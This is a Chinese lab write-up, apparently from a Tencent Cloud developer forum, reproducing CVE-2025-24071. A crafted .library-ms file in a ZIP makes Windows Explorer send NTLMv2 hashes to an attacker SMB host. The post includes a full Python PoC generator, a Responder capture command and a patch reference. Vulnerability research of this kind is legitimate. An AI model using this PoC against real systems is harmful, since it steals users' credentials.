首页
学习
活动
专区
圈层
工具
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

【漏洞复现】CVE-2025-24071|Windows 文件资源管理器欺骗漏洞

0x00 前言

Windows文件资源管理器(File Explorer)是Windows操作系统的核心组件,主要用于浏览、管理和操作本地及网络文件、文件夹、驱动器等资源。它提供直观的图形化界面,支持文件创建、复制、移动、删除、重命名等基础操作,同时集成网络共享访问、外部设备管理、文件搜索与筛选等高级功能,是多任务文件处理的核心工具‌。

0x01 漏洞描述

Windows资源管理器在解压包含特制 .library-ms文件的 RAR/ZIP 存档时,会自动解析该文件内嵌的恶意SMB路径(如 \\192.168.1.116\shared),触发隐式NTLM认证握手,导致用户NTLMv2哈希泄露。

0x02 漏洞复现

(1)准备工具

Windows系统(被攻击)IP:192.168.2.11Kali Linux(攻击)IP:192.168.2.12CVE-2025-24071的POC文件a.pyKali Linux中间人工具responder

(2)复现过程

1、设置windows的IP地址:192.168.2.11

2、设置kali的IP地址:192.168.2.12

3、在kali中打开responder中间人工具,终端执行命令:

sudo responder -I eth0 -v

4、生成恶意压缩包,终端执行命令python a.py

a.py内容如下:      

import osimport zipfiledef main():   file_name = input("Enter your file name: ")   ip_address = input("Enter IP (EX: 192.168.1.162): ")   library_content = f"""<?xml version="1.0" encoding="UTF-8"?><searchConnectorDescriptionList>   <searchConnectorDescription>     <simpleLocation>       <url>\\\\{ip_address}\\shared</url>     </simpleLocation>   </searchConnectorDescription></searchConnectorDescriptionList>"""   library_file_name = f"{file_name}.library-ms"   with open(library_file_name, "w", encoding="utf-8") as f:       f.write(library_content)   with zipfile.ZipFile("exploit.zip", mode="w", compression=zipfile.ZIP_DEFLATED) as zipf:       zipf.write(library_file_name)   if os.path.exists(library_file_name):       os.remove(library_file_name)   print("completed")if __name__ == "__main__":   main()

5、把生成的exploit.zip压缩包放到windows系统中解压。

6、kali系统中成功获取到windows的hash

0x03 漏洞补丁

编号:KB5053606 

0x04 参考链接

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24071

  • 发表于:
  • 原文链接https://page.om.qq.com/page/Of5A1fyovpBmHItZQ-KpxVoA0
  • 腾讯「腾讯云开发者社区」是腾讯内容开放平台帐号(企鹅号)传播渠道之一,根据《腾讯内容开放平台服务协议》转载发布内容。
  • 如有侵权,请联系 cloudcommunity@tencent.com 删除。

扫码

添加站长 进交流群

领取专属 10元无门槛券

私享最新 技术干货

扫码加入开发者社群
领券